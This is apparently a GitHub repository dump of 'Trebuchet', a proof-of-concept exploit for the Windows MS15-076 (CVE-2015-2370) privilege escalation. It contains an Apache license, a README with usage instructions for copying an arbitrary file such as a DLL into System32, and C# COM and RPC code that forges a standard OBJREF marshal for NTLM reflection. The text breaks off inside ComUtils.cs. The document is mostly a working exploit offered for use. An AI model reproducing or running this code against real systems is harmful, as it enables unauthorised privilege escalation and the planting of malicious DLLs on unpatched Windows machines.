├── .vs └── Trebuchet │ └── v14 │ └── .suo ├── Binary ├── Microsoft.VisualStudio.OLE.Interop.dll └── Trebuchet.exe ├── LICENSE ├── README.md ├── Trebuchet.sln └── Trebuchet ├── ComInterfaces.cs ├── ComUtils.cs ├── Microsoft.VisualStudio.OLE.Interop.dll ├── PackageBuilder.cs ├── Program.cs ├── Properties ├── AssemblyInfo.cs ├── Resources.Designer.cs └── Resources.resx ├── Resources ├── CreateSymlinkx64.exe └── CreateSymlinkx86.exe ├── Trebuchet.csproj ├── bin └── Release │ ├── Microsoft.VisualStudio.OLE.Interop.dll │ ├── Trebuchet.exe │ ├── Trebuchet.pdb │ ├── Trebuchet.vshost.exe │ └── Trebuchet.vshost.exe.manifest ├── obj ├── Debug │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources │ ├── Poc_DCERPCNTLMReflection_EoP.csproj.FileListAbsolute.txt │ ├── Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache │ ├── Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache │ ├── Poc_DCERPCNTLMReflection_EoP.exe │ ├── Poc_DCERPCNTLMReflection_EoP.pdb │ ├── TempPE │ │ └── Properties.Resources.Designer.cs.dll │ ├── Trebuchet.Properties.Resources.resources │ ├── Trebuchet.csproj.FileListAbsolute.txt │ ├── Trebuchet.csproj.GenerateResource.Cache │ ├── Trebuchet.csprojResolveAssemblyReference.cache │ ├── Trebuchet.exe │ ├── Trebuchet.pdb │ └── build.force └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── TempPE │ └── Properties.Resources.Designer.cs.dll │ ├── Trebuchet.Properties.Resources.resources │ ├── Trebuchet.csproj.FileListAbsolute.txt │ ├── Trebuchet.csproj.GenerateResource.Cache │ ├── Trebuchet.csprojResolveAssemblyReference.cache │ ├── Trebuchet.exe │ └── Trebuchet.pdb └── request.bin /.vs/Trebuchet/v14/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/.vs/Trebuchet/v14/.suo 
-------------------------------------------------------------------------------- /Binary/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Binary/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /Binary/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Binary/Trebuchet.exe -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 
25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. 
For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. 
If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. 
You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. 
You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. 
(Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trebuchet 2 | ##### MS15-076 (CVE-2015-2370) Privilege Escalation 3 | ###### Copies a file to any privileged location on disk 4 | 5 | Compiled with VS2015, precompiled exe in Binary directory 6 | 7 | Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll 8 | 9 | This is a lightly modified Proof of Concept by James Forshaw with Google, found here: https://code.google.com/p/google-security-research/issues/detail?id=325 10 | 11 | CreateSymlink tool was written by James Forshaw, found here: 12 | https://github.com/google/symboliclink-testing-tools 13 | 14 | Notes: 15 | - Microsoft.VisualStudio.OLE.Interop.dll must be in the same directory 16 | - Exploit can only be run once every 2-3 minutes. 
This is because RPC can be held up by LocalSystem 17 | - Tested on x64/x86 Windows 7/8.1 18 | -------------------------------------------------------------------------------- /Trebuchet.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.22823.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Trebuchet", "Trebuchet\Trebuchet.csproj", "{02385F73-4546-4193-A112-EF17E4EADA62}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {02385F73-4546-4193-A112-EF17E4EADA62}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {02385F73-4546-4193-A112-EF17E4EADA62}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {02385F73-4546-4193-A112-EF17E4EADA62}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {02385F73-4546-4193-A112-EF17E4EADA62}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Trebuchet/ComInterfaces.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.VisualStudio.OLE.Interop; 2 | using System; 3 | using IS = System.Runtime.InteropServices; 4 | 5 | namespace Trebuchet 6 | { 7 | [IS.ComVisible(true)] 8 | public class TestClass : IMarshal, IStorage 9 | { 10 | private IStorage _stg; 11 | private string _binding; 12 | 13 | public TestClass(IStorage stg, string binding) 14 | { 15 | _stg = stg; 16 | _binding = binding; 17 | } 18 | 19 | public void DisconnectObject(uint dwReserved) 20 | { 21 | } 22 | 23 | 
public void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize) 24 | { 25 | pSize = 1024; 26 | } 27 | 28 | public void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid) 29 | { 30 | pCid = new Guid("00000306-0000-0000-c000-000000000046"); 31 | } 32 | 33 | public void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS) 34 | { 35 | uint written; 36 | byte[] data = ComUtils.CreateStandardMarshal(_binding); 37 | 38 | pstm.Write(data, (uint)data.Length, out written); 39 | } 40 | 41 | public void ReleaseMarshalData(IStream pstm) 42 | { 43 | } 44 | 45 | public void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv) 46 | { 47 | ppv = IntPtr.Zero; 48 | } 49 | 50 | public void Commit(uint grfCommitFlags) 51 | { 52 | _stg.Commit(grfCommitFlags); 53 | } 54 | 55 | public void CopyTo(uint ciidExclude, Guid[] rgiidExclude, IntPtr snbExclude, IStorage pstgDest) 56 | { 57 | _stg.CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); 58 | } 59 | 60 | public void CreateStorage(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStorage ppstg) 61 | { 62 | _stg.CreateStorage(pwcsName, grfMode, reserved1, reserved2, out ppstg); 63 | } 64 | 65 | public void CreateStream(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStream ppstm) 66 | { 67 | _stg.CreateStream(pwcsName, grfMode, reserved1, reserved2, out ppstm); 68 | } 69 | 70 | public void DestroyElement(string pwcsName) 71 | { 72 | _stg.DestroyElement(pwcsName); 73 | } 74 | 75 | public void EnumElements(uint reserved1, IntPtr reserved2, uint reserved3, out IEnumSTATSTG ppEnum) 76 | { 77 | _stg.EnumElements(reserved1, reserved2, reserved3, out ppEnum); 78 | } 79 | 80 | public void MoveElementTo(string pwcsName, IStorage pstgDest, string pwcsNewName, uint grfFlags) 81 | { 82 | 
_stg.MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); 83 | } 84 | 85 | public void OpenStorage(string pwcsName, IStorage pstgPriority, uint grfMode, IntPtr snbExclude, uint reserved, out IStorage ppstg) 86 | { 87 | _stg.OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, out ppstg); 88 | } 89 | 90 | public void OpenStream(string pwcsName, IntPtr reserved1, uint grfMode, uint reserved2, out IStream ppstm) 91 | { 92 | _stg.OpenStream(pwcsName, reserved1, grfMode, reserved2, out ppstm); 93 | } 94 | 95 | public void RenameElement(string pwcsOldName, string pwcsNewName) 96 | { 97 | 98 | } 99 | 100 | public void Revert() 101 | { 102 | 103 | } 104 | 105 | public void SetClass(ref Guid clsid) 106 | { 107 | 108 | } 109 | 110 | public void SetElementTimes(string pwcsName, FILETIME[] pctime, FILETIME[] patime, FILETIME[] pmtime) 111 | { 112 | 113 | } 114 | 115 | public void SetStateBits(uint grfStateBits, uint grfMask) 116 | { 117 | } 118 | 119 | public void Stat(STATSTG[] pstatstg, uint grfStatFlag) 120 | { 121 | _stg.Stat(pstatstg, grfStatFlag); 122 | pstatstg[0].pwcsName = "hello.stg"; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /Trebuchet/ComUtils.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.VisualStudio.OLE.Interop; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace Trebuchet 9 | { 10 | static class ComUtils 11 | { 12 | [DllImport("ole32.dll")] 13 | static extern int CreateObjrefMoniker( 14 | IntPtr punk, 15 | out IMoniker ppmk); 16 | 17 | [DllImport("ole32.dll")] 18 | static extern int CreateBindCtx( 19 | int reserved, 20 | out IBindCtx ppbc 21 | ); 22 | 23 | [StructLayout(LayoutKind.Sequential)] 24 | struct MULTI_QI 25 | { 26 | public IntPtr pIID; 27 | [MarshalAs(UnmanagedType.Interface)] 28 | public object pItf; 29 | 
public int hr; 30 | } 31 | 32 | [Flags] 33 | public enum STGM : int 34 | { 35 | DIRECT = 0x00000000, 36 | TRANSACTED = 0x00010000, 37 | SIMPLE = 0x08000000, 38 | READ = 0x00000000, 39 | WRITE = 0x00000001, 40 | READWRITE = 0x00000002, 41 | SHARE_DENY_NONE = 0x00000040, 42 | SHARE_DENY_READ = 0x00000030, 43 | SHARE_DENY_WRITE = 0x00000020, 44 | SHARE_EXCLUSIVE = 0x00000010, 45 | PRIORITY = 0x00040000, 46 | DELETEONRELEASE = 0x04000000, 47 | NOSCRATCH = 0x00100000, 48 | CREATE = 0x00001000, 49 | CONVERT = 0x00020000, 50 | FAILIFTHERE = 0x00000000, 51 | NOSNAPSHOT = 0x00200000, 52 | DIRECT_SWMR = 0x00400000, 53 | } 54 | 55 | [StructLayout(LayoutKind.Sequential)] 56 | class COSERVERINFO 57 | { 58 | public uint dwReserved1; 59 | [MarshalAs(UnmanagedType.LPWStr)] 60 | public string pwszName; 61 | public IntPtr pAuthInfo; 62 | public uint dwReserved2; 63 | } 64 | 65 | [DllImport("ole32.dll", PreserveSig = false, CharSet = CharSet.Unicode)] 66 | static extern void StgCreateDocfile([MarshalAs(UnmanagedType.LPWStr)] 67 | string pwcsName, STGM grfMode, uint reserved, out IStorage ppstgOpen); 68 | 69 | const uint GMEM_MOVEABLE = 2; 70 | 71 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 72 | static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes); 73 | 74 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 75 | static extern void CreateILockBytesOnHGlobal( 76 | IntPtr hGlobal, 77 | [MarshalAs(UnmanagedType.Bool)] bool fDeleteOnRelease, 78 | out IntPtr ppLkbyt); 79 | 80 | static IntPtr GuidToPointer(string guid) 81 | { 82 | Guid g = new Guid(guid); 83 | 84 | IntPtr ret = Marshal.AllocCoTaskMem(16); 85 | Marshal.Copy(g.ToByteArray(), 0, ret, 16); 86 | 87 | return ret; 88 | } 89 | 90 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 91 | static extern void StgCreateDocfileOnILockBytes( 92 | IntPtr plkbyt, 93 | STGM grfMode, 94 | uint reserved, 95 | out IStorage ppstgOpen); 96 | 97 | public static IntPtr 
IID_IUnknownPtr = GuidToPointer("00000000-0000-0000-C000-000000000046"); 98 | 99 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 100 | static extern void CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, ref Guid pclsid, 101 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, CLSCTX dwClsCtx, 102 | IStorage pstg, uint cmq, [In, Out] MULTI_QI[] rgmqResults); 103 | 104 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true, CharSet = CharSet.Unicode)] 105 | static extern void CoGetInstanceFromFile( 106 | COSERVERINFO pServerInfo, 107 | ref Guid pClsid, 108 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, 109 | CLSCTX dwClsCtx, 110 | STGM grfMode, 111 | string pwszName, 112 | uint cmq, 113 | [In, Out] MULTI_QI[] rgmqResults); 114 | 115 | [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] 116 | static extern void CoCreateInstanceEx( 117 | [In, MarshalAs(UnmanagedType.LPStruct)] Guid rclsid, 118 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, 119 | CLSCTX dwClsCtx, 120 | COSERVERINFO pServerInfo, 121 | uint cmq, 122 | [In, Out] MULTI_QI[] pResults); 123 | 124 | public delegate uint OleStreamMethod(IntPtr a, IntPtr b, uint c); 125 | 126 | [StructLayout(LayoutKind.Sequential)] 127 | public class OLESTREAM 128 | { 129 | [MarshalAs(UnmanagedType.FunctionPtr)] 130 | public OleStreamMethod GetMethod; 131 | [MarshalAs(UnmanagedType.FunctionPtr)] 132 | public OleStreamMethod SetMethod; 133 | } 134 | 135 | [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)] 136 | static extern void OleConvertOLESTREAMToIStorage( 137 | ref OLESTREAM lpolestream, 138 | IStorage pstg, 139 | IntPtr ptd); 140 | 141 | [DllImport("Shlwapi.dll", CharSet = CharSet.Unicode, PreserveSig = false)] 142 | static extern void SHCreateStreamOnFile( 143 | string pszFile, 144 | STGM grfMode, 145 | out IStream ppstm 146 | ); 147 | 148 | [Flags] 149 | public enum CLSCTX : 
uint 150 | { 151 | CLSCTX_INPROC_SERVER = 0x1, 152 | CLSCTX_INPROC_HANDLER = 0x2, 153 | CLSCTX_LOCAL_SERVER = 0x4, 154 | CLSCTX_INPROC_SERVER16 = 0x8, 155 | CLSCTX_REMOTE_SERVER = 0x10, 156 | CLSCTX_INPROC_HANDLER16 = 0x20, 157 | CLSCTX_RESERVED1 = 0x40, 158 | CLSCTX_RESERVED2 = 0x80, 159 | CLSCTX_RESERVED3 = 0x100, 160 | CLSCTX_RESERVED4 = 0x200, 161 | CLSCTX_NO_CODE_DOWNLOAD = 0x400, 162 | CLSCTX_RESERVED5 = 0x800, 163 | CLSCTX_NO_CUSTOM_MARSHAL = 0x1000, 164 | CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000, 165 | CLSCTX_NO_FAILURE_LOG = 0x4000, 166 | CLSCTX_DISABLE_AAA = 0x8000, 167 | CLSCTX_ENABLE_AAA = 0x10000, 168 | CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000, 169 | CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000, 170 | CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000, 171 | CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, 172 | CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER, 173 | CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER 174 | } 175 | 176 | static byte[] GenerateStringBindings(IEnumerable names) 177 | { 178 | using (MemoryStream stm = new MemoryStream()) 179 | { 180 | using (BinaryWriter writer = new BinaryWriter(stm)) 181 | { 182 | foreach (string name in names) 183 | { 184 | ushort towerId = 7; 185 | string address = name; 186 | 187 | if (name.StartsWith("@")) 188 | { 189 | string[] v = name.Substring(1).Split(':'); 190 | 191 | if (v.Length != 2) 192 | { 193 | throw new InvalidDataException(String.Format("Invalid name {0}", name)); 194 | } 195 | 196 | towerId = ushort.Parse(v[0]); 197 | address = v[1]; 198 | } 199 | 200 | writer.Write(towerId); 201 | writer.Write(Encoding.Unicode.GetBytes(address + "\0")); 202 | } 203 | 204 | writer.Write((ushort)0); 205 | } 206 | 207 | return stm.ToArray(); 208 | } 209 | } 210 | 211 | static byte[] GenerateSecurityBindings() 212 | { 213 | // RPC_C_AUTHN_WINNT - 0x0A 214 | using (MemoryStream stm = new MemoryStream()) 215 | { 216 | using (BinaryWriter writer = new BinaryWriter(stm)) 217 | { 218 | 
writer.Write((ushort)0xA); 219 | writer.Write((ushort)0xFFFF); 220 | writer.Write((ushort)0); 221 | 222 | writer.Write((ushort)0); 223 | } 224 | 225 | return stm.ToArray(); 226 | } 227 | } 228 | 229 | static byte[] GenerateDualStringArray(IEnumerable names) 230 | { 231 | byte[] stringBindings = GenerateStringBindings(names); 232 | byte[] securityBindings = GenerateSecurityBindings(); 233 | 234 | using (MemoryStream stm = new MemoryStream()) 235 | { 236 | using (BinaryWriter writer = new BinaryWriter(stm)) 237 | { 238 | ushort totalLength = (ushort)((stringBindings.Length + securityBindings.Length) / 2); 239 | ushort securityOffset = (ushort)(stringBindings.Length / 2); 240 | 241 | writer.Write(totalLength); 242 | writer.Write(securityOffset); 243 | writer.Write(stringBindings); 244 | writer.Write(securityBindings); 245 | } 246 | 247 | return stm.ToArray(); 248 | } 249 | } 250 | 251 | public static byte[] CreateStandardMarshal(params string[] names) 252 | { 253 | Random r = new Random(); 254 | 255 | using (MemoryStream stm = new MemoryStream()) 256 | { 257 | using (BinaryWriter writer = new BinaryWriter(stm)) 258 | { 259 | Guid iid_IUnknown = Guid.Parse("00000000-0000-0000-C000-000000000046"); 260 | 261 | writer.Write(0x574f454d); // MEOW 262 | writer.Write(0x00000001); // OBJREF_STANDARD 263 | writer.Write(iid_IUnknown.ToByteArray()); // IID_IUnknown 264 | 265 | // STANDARD Structure 266 | writer.Write(0); // Flags 267 | writer.Write(1); // cPublicRefs 268 | 269 | // Concatenation of oxid, opid and ipid 270 | byte[] ids = new byte[32]; 271 | 272 | r.NextBytes(ids); 273 | writer.Write(ids); 274 | 275 | writer.Write(GenerateDualStringArray(names)); 276 | } 277 | 278 | return stm.ToArray(); 279 | } 280 | } 281 | 282 | public static IStorage CreateStorage() 283 | { 284 | IntPtr gh = IntPtr.Zero; 285 | IntPtr lb; 286 | IStorage ret; 287 | 288 | ComUtils.CreateILockBytesOnHGlobal(gh, true, out lb); 289 | ComUtils.StgCreateDocfileOnILockBytes(lb, STGM.CREATE | 
STGM.READWRITE | STGM.SHARE_EXCLUSIVE, 0, out ret); 290 | 291 | return ret; 292 | } 293 | 294 | public static IStorage CreateStorage(string path) 295 | { 296 | IStorage stg; 297 | 298 | ComUtils.StgCreateDocfile(path, STGM.CREATE | STGM.READWRITE | STGM.SHARE_EXCLUSIVE, 0, out stg); 299 | 300 | return stg; 301 | } 302 | 303 | public static IStream CreateStream(string path) 304 | { 305 | IStream stm; 306 | 307 | SHCreateStreamOnFile(path, STGM.READWRITE, out stm); 308 | 309 | return stm; 310 | } 311 | 312 | public const string CLSID_Package = "f20da720-c02f-11ce-927b-0800095ae340"; 313 | 314 | public static IStorage CreatePackageStorage(string name, byte[] filedata) 315 | { 316 | MemoryStream ms = new MemoryStream(PackageBuilder.BuildPackage(@"C:\testme\"+name, filedata)); 317 | IStorage stg = CreateStorage("dump.stg"); 318 | ComUtils.OLESTREAM stm = new ComUtils.OLESTREAM(); 319 | stm.GetMethod = (a, b, c) => 320 | { 321 | //Console.WriteLine("{0} {1} {2}", a, b, c); 322 | 323 | byte[] data = new byte[c]; 324 | 325 | int len = ms.Read(data, 0, (int)c); 326 | 327 | Marshal.Copy(data, 0, b, len); 328 | 329 | return (uint)len; 330 | }; 331 | 332 | OleConvertOLESTREAMToIStorage(ref stm, stg, IntPtr.Zero); 333 | // Console.WriteLine("Creating File..."); 334 | Guid g = new Guid(CLSID_Package); 335 | stg.SetClass(ref g); 336 | 337 | return stg; 338 | } 339 | 340 | public static byte[] GetMarshalledObject(object o) 341 | { 342 | IMoniker mk; 343 | 344 | CreateObjrefMoniker(Marshal.GetIUnknownForObject(o), out mk); 345 | 346 | IBindCtx bc; 347 | 348 | CreateBindCtx(0, out bc); 349 | 350 | string name; 351 | 352 | mk.GetDisplayName(bc, null, out name); 353 | 354 | return Convert.FromBase64String(name.Substring(7).TrimEnd(':')); 355 | } 356 | 357 | public static void BootstrapComMarshal(int port) 358 | { 359 | IStorage stg = ComUtils.CreateStorage(); 360 | 361 | // Use a known local system service COM server, in this cast BITSv1 362 | Guid clsid = new 
